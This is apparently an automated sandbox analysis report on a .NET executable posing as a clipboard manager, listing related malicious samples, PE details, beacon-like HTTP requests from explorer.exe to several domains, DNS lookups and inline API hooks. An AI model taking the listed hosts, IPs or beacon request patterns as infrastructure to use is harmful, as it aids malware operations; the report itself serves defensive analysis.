	documents-26926602.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-26926602.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-192987462.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-192987462.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-1926412023.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-1926412023.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-102763662.xlsm	Get hash	malicious	Browse	67.205.36.230
	documents-102763662.xlsm	Get hash	malicious	Browse	67.205.36.230
	Financial Results April 21.pptx (9,753K).exe	Get hash	malicious	Browse	66.33.210.242
HKKFGL-AS-APHKKwaifongGroupLimitedHK	bt.apk	Get hash	malicious	Browse	39.109.113.244
	#U6e05#U65b0#U59b9#U5a9a#U7167#U9a97@16.exe	Get hash	malicious	Browse	110.92.66.233
	#U5e74#U7ec8#U63d0#U6210#U5206#U7ea2#U6838#U5bf9#U8868@i4.exe	Get hash	malicious	Browse	110.92.66.246
	insz.exe	Get hash	malicious	Browse	88.218.145.49
	DOCUMENTO_MEDICO.doc	Get hash	malicious	Browse	154.221.28.167
	NI3651011817UL.doc	Get hash	malicious	Browse	103.210.237.241
	BAL_46979369.doc	Get hash	malicious	Browse	103.210.237.241
	427424855528075826480424.doc	Get hash	malicious	Browse	103.210.237.241
	FILE_81380052.doc	Get hash	malicious	Browse	103.210.237.241
	FILE_PO_09152020EX.doc	Get hash	malicious	Browse	103.210.237.241
	DOC_PO_09152020EX.doc	Get hash	malicious	Browse	103.210.237.241
	KH3117818420XX.doc	Get hash	malicious	Browse	103.210.237.241
	XCP_87353228.doc	Get hash	malicious	Browse	103.210.237.241
	BAL_PO_09152020EX.doc	Get hash	malicious	Browse	103.210.237.241
	IO3812758081JW.doc	Get hash	malicious	Browse	103.210.237.241
	BAL_53345761.doc	Get hash	malicious	Browse	103.210.237.241
	FILE_PO_09152020EX.doc	Get hash	malicious	Browse	103.210.237.241
	FILE_YZGLOSASM.doc	Get hash	malicious	Browse	103.210.237.241
	BAL_3105782760272.doc	Get hash	malicious	Browse	103.210.237.241
	VCG4PMFIB0AR.doc	Get hash	malicious	Browse	103.210.237.241

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log Download File
Process:	C:\Users\user\Desktop\ox87DNNM8d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.613842542238479
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ox87DNNM8d.exe
File size:	840704
MD5:	41e38bcd6f5f3001c2e4f08ebcd2396c
SHA1:	2f3b2173d7a5a3a19e8a73d5fbfde7abc1836909
SHA256:	4e2b4396335fc6d3e6ff8c19b326f0f6342f537ba026ce1901d2122b2c7b3e4c
SHA512:	20c03ac7e5647f2140f9c969046fd9aa86e18b352387e52238a1f652694a40a374aa499309827f71599de6cad899397a373bc9d3d1cc83e7ed8a37593d386bd4
SSDEEP:	24576:cAXIVpK3/ZWzEtY+i+/+He2yjmfNRp+n6:9EpK3/ZWYtYv0+He2emV+6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................0...........O... ...`....@.. ....................... ............@................................

File Icon


Icon Hash:	f8ce929a929a92d4

Static PE Info

General
Entrypoint:	0x4b4fb2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60948AF6 [Fri May 7 00:33:58 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb4f58	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8000	0x19eb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb2fb8	0xb3000	False	0.92964112692	data	7.93204508639	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xb8000	0x19eb8	0x1a000	False	0.0641432542067	data	2.31358815064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xb8220	0xac5	PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced
RT_ICON	0xb8ce8	0xb20	data
RT_ICON	0xb9808	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 16777215, next used block 16777215
RT_ICON	0xbbdb0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 16777215, next used block 16777215
RT_ICON	0xbce58	0x10828	data
RT_ICON	0xcd680	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 16777215, next used block 16777215
RT_GROUP_ICON	0xd18a8	0x5a	data
RT_VERSION	0xd1904	0x400	data
RT_MANIFEST	0xd1d04	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Crowbar 2015. This software is licensed under the GNU General Public License v3.0 or above.
Assembly Version	1.0.0.0
InternalName	DateTimeNative.exe
FileVersion	1.0.0.0
CompanyName	Crowbar
LegalTrademarks
Comments	Awesome clipboard manager.
ProductName	Clippy
ProductVersion	1.0.0.0
FileDescription	Clippy
OriginalFilename	DateTimeNative.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/12/21-06:30:28.857747	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49728	35.186.238.101	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 06:30:08.731209040 CEST	49720	80	192.168.2.5	75.119.206.89
May 12, 2021 06:30:08.932468891 CEST	80	49720	75.119.206.89	192.168.2.5
May 12, 2021 06:30:08.932590961 CEST	49720	80	192.168.2.5	75.119.206.89
May 12, 2021 06:30:08.932787895 CEST	49720	80	192.168.2.5	75.119.206.89
May 12, 2021 06:30:09.134083986 CEST	80	49720	75.119.206.89	192.168.2.5
May 12, 2021 06:30:09.236999989 CEST	80	49720	75.119.206.89	192.168.2.5
May 12, 2021 06:30:09.238914967 CEST	49720	80	192.168.2.5	75.119.206.89
May 12, 2021 06:30:09.240603924 CEST	80	49720	75.119.206.89	192.168.2.5
May 12, 2021 06:30:09.241219997 CEST	49720	80	192.168.2.5	75.119.206.89
May 12, 2021 06:30:09.441761017 CEST	80	49720	75.119.206.89	192.168.2.5
May 12, 2021 06:30:28.676335096 CEST	49728	80	192.168.2.5	35.186.238.101
May 12, 2021 06:30:28.720247984 CEST	80	49728	35.186.238.101	192.168.2.5
May 12, 2021 06:30:28.721172094 CEST	49728	80	192.168.2.5	35.186.238.101
May 12, 2021 06:30:28.721317053 CEST	49728	80	192.168.2.5	35.186.238.101
May 12, 2021 06:30:28.762145996 CEST	80	49728	35.186.238.101	192.168.2.5
May 12, 2021 06:30:28.857747078 CEST	80	49728	35.186.238.101	192.168.2.5
May 12, 2021 06:30:28.858009100 CEST	49728	80	192.168.2.5	35.186.238.101
May 12, 2021 06:30:28.858123064 CEST	80	49728	35.186.238.101	192.168.2.5
May 12, 2021 06:30:28.858201027 CEST	49728	80	192.168.2.5	35.186.238.101
May 12, 2021 06:30:28.898891926 CEST	80	49728	35.186.238.101	192.168.2.5
May 12, 2021 06:30:51.399552107 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:51.676214933 CEST	80	49730	43.249.29.43	192.168.2.5
May 12, 2021 06:30:51.676359892 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:51.676578999 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:51.971482038 CEST	80	49730	43.249.29.43	192.168.2.5
May 12, 2021 06:30:51.971520901 CEST	80	49730	43.249.29.43	192.168.2.5
May 12, 2021 06:30:51.971709967 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:52.173600912 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:52.250524998 CEST	80	49730	43.249.29.43	192.168.2.5
May 12, 2021 06:30:52.250617981 CEST	49730	80	192.168.2.5	43.249.29.43
May 12, 2021 06:30:52.452609062 CEST	80	49730	43.249.29.43	192.168.2.5
May 12, 2021 06:30:52.452783108 CEST	49730	80	192.168.2.5	43.249.29.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 06:28:38.799510002 CEST	64344	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:38.854988098 CEST	53	64344	8.8.8.8	192.168.2.5
May 12, 2021 06:28:39.447067976 CEST	62060	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:39.520203114 CEST	53	62060	8.8.8.8	192.168.2.5
May 12, 2021 06:28:40.034023046 CEST	61805	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:40.090976954 CEST	53	61805	8.8.8.8	192.168.2.5
May 12, 2021 06:28:41.152870893 CEST	54795	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:41.201633930 CEST	53	54795	8.8.8.8	192.168.2.5
May 12, 2021 06:28:41.601744890 CEST	49557	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:41.662442923 CEST	53	49557	8.8.8.8	192.168.2.5
May 12, 2021 06:28:45.705430031 CEST	61733	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:45.756230116 CEST	53	61733	8.8.8.8	192.168.2.5
May 12, 2021 06:28:47.224498987 CEST	65447	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:47.273613930 CEST	53	65447	8.8.8.8	192.168.2.5
May 12, 2021 06:28:48.591703892 CEST	52441	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:48.651035070 CEST	53	52441	8.8.8.8	192.168.2.5
May 12, 2021 06:28:50.457161903 CEST	62176	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:50.505949020 CEST	53	62176	8.8.8.8	192.168.2.5
May 12, 2021 06:28:51.592045069 CEST	59596	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:51.640861988 CEST	53	59596	8.8.8.8	192.168.2.5
May 12, 2021 06:28:53.460700989 CEST	65296	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:53.512550116 CEST	53	65296	8.8.8.8	192.168.2.5
May 12, 2021 06:28:54.732152939 CEST	63183	53	192.168.2.5	8.8.8.8
May 12, 2021 06:28:54.782819033 CEST	53	63183	8.8.8.8	192.168.2.5
May 12, 2021 06:29:07.680038929 CEST	60151	53	192.168.2.5	8.8.8.8
May 12, 2021 06:29:07.741580963 CEST	53	60151	8.8.8.8	192.168.2.5
May 12, 2021 06:29:25.114991903 CEST	56969	53	192.168.2.5	8.8.8.8
May 12, 2021 06:29:25.180248976 CEST	53	56969	8.8.8.8	192.168.2.5
May 12, 2021 06:29:46.937997103 CEST	55161	53	192.168.2.5	8.8.8.8
May 12, 2021 06:29:46.999602079 CEST	53	55161	8.8.8.8	192.168.2.5
May 12, 2021 06:29:48.188477993 CEST	54757	53	192.168.2.5	8.8.8.8
May 12, 2021 06:29:48.268415928 CEST	53	54757	8.8.8.8	192.168.2.5
May 12, 2021 06:29:59.183288097 CEST	49992	53	192.168.2.5	8.8.8.8
May 12, 2021 06:29:59.251389980 CEST	53	49992	8.8.8.8	192.168.2.5
May 12, 2021 06:30:08.481898069 CEST	60075	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:08.707669020 CEST	53	60075	8.8.8.8	192.168.2.5
May 12, 2021 06:30:13.955764055 CEST	55016	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:14.014740944 CEST	53	55016	8.8.8.8	192.168.2.5
May 12, 2021 06:30:18.336004019 CEST	64345	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:18.397649050 CEST	53	64345	8.8.8.8	192.168.2.5
May 12, 2021 06:30:28.614039898 CEST	57128	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:28.675231934 CEST	53	57128	8.8.8.8	192.168.2.5
May 12, 2021 06:30:48.976097107 CEST	54791	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:49.052944899 CEST	53	54791	8.8.8.8	192.168.2.5
May 12, 2021 06:30:51.048041105 CEST	50463	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:51.398247957 CEST	53	50463	8.8.8.8	192.168.2.5
May 12, 2021 06:30:51.405097961 CEST	50394	53	192.168.2.5	8.8.8.8
May 12, 2021 06:30:51.478733063 CEST	53	50394	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 06:29:48.188477993 CEST	192.168.2.5	8.8.8.8	0x9fe0	Standard query (0)	www.secureproductsolutions.net	A (IP address)	IN (0x0001)
May 12, 2021 06:30:08.481898069 CEST	192.168.2.5	8.8.8.8	0xba98	Standard query (0)	www.dcsdeliveryaz.website	A (IP address)	IN (0x0001)
May 12, 2021 06:30:28.614039898 CEST	192.168.2.5	8.8.8.8	0x26ee	Standard query (0)	www.americacivics.com	A (IP address)	IN (0x0001)
May 12, 2021 06:30:51.048041105 CEST	192.168.2.5	8.8.8.8	0x89c	Standard query (0)	www.vstarfireworks.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 06:29:48.268415928 CEST	8.8.8.8	192.168.2.5	0x9fe0	Name error (3)	www.secureproductsolutions.net	none	none	A (IP address)	IN (0x0001)
May 12, 2021 06:30:08.707669020 CEST	8.8.8.8	192.168.2.5	0xba98	No error (0)	www.dcsdeliveryaz.website		75.119.206.89	A (IP address)	IN (0x0001)
May 12, 2021 06:30:28.675231934 CEST	8.8.8.8	192.168.2.5	0x26ee	No error (0)	www.americacivics.com		35.186.238.101	A (IP address)	IN (0x0001)
May 12, 2021 06:30:51.398247957 CEST	8.8.8.8	192.168.2.5	0x89c	No error (0)	www.vstarfireworks.com	t181.deegeechina.com		CNAME (Canonical name)	IN (0x0001)
May 12, 2021 06:30:51.398247957 CEST	8.8.8.8	192.168.2.5	0x89c	No error (0)	t181.deegeechina.com		43.249.29.43	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.dcsdeliveryaz.website

www.americacivics.com

www.vstarfireworks.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49720	75.119.206.89	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 06:30:08.932787895 CEST	1393	OUT	GET /sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da HTTP/1.1 Host: www.dcsdeliveryaz.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 06:30:09.236999989 CEST	1394	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 12 May 2021 04:30:09 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Upgrade: h2 Connection: Upgrade, close Location: http://dcsdeliveryaz.website/sve/?B6Ah=exmy3Nx7PpUJKJt1HtiGWNpuQz3EYRIgq3k+uiZc9JLQuvdlfCRkPG1S5SdPXsQAS6a5&8pW=2dUh0da Vary: User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49728	35.186.238.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 06:30:28.721317053 CEST	4707	OUT	GET /sve/?8pW=2dUh0da&B6Ah=pTnyDIvt+g7sdgQmMg9D2FnTPO22hVGFgxtUPmNZyFP4G/454L1vxjiDnOTVCmVO7LzE HTTP/1.1 Host: www.americacivics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 06:30:28.857747078 CEST	4707	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 12 May 2021 04:30:28 GMT Content-Type: text/html Content-Length: 275 ETag: "6099a39b-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49730	43.249.29.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 06:30:51.676578999 CEST	4725	OUT	GET /sve/?B6Ah=2mSxzHKvGhdVKk9ZF/49Uvkx+tNG2gtFJsc3MZrG0ttjvP+42CyBXtijrWDGJsqiNYNw&8pW=2dUh0da HTTP/1.1 Host: www.vstarfireworks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 06:30:51.971482038 CEST	4727	IN	HTTP/1.1 404 Not Found Cache-Control: no-store Pragma: no-cache Content-Type: text/html Server: IIS X-Powered-By: WAF/2.0 Date: Wed, 12 May 2021 05:07:40 GMT Connection: close Content-Length: 1163 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-si
May 12, 2021 06:30:51.971520901 CEST	4727	IN	Data Raw: 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 Data Ascii: ze:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;
May 12, 2021 06:30:52.250524998 CEST	4728	IN	Data Raw: 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 Data Ascii: ative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEC
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEC
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEC
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEC

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ox87DNNM8d.exe PID: 4368 Parent PID: 5700

General

Start time:	06:28:46
Start date:	12/05/2021
Path:	C:\Users\user\Desktop\ox87DNNM8d.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ox87DNNM8d.exe'
Imagebase:	0xb50000
File size:	840704 bytes
MD5 hash:	41E38BCD6F5F3001C2E4F08EBCD2396C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
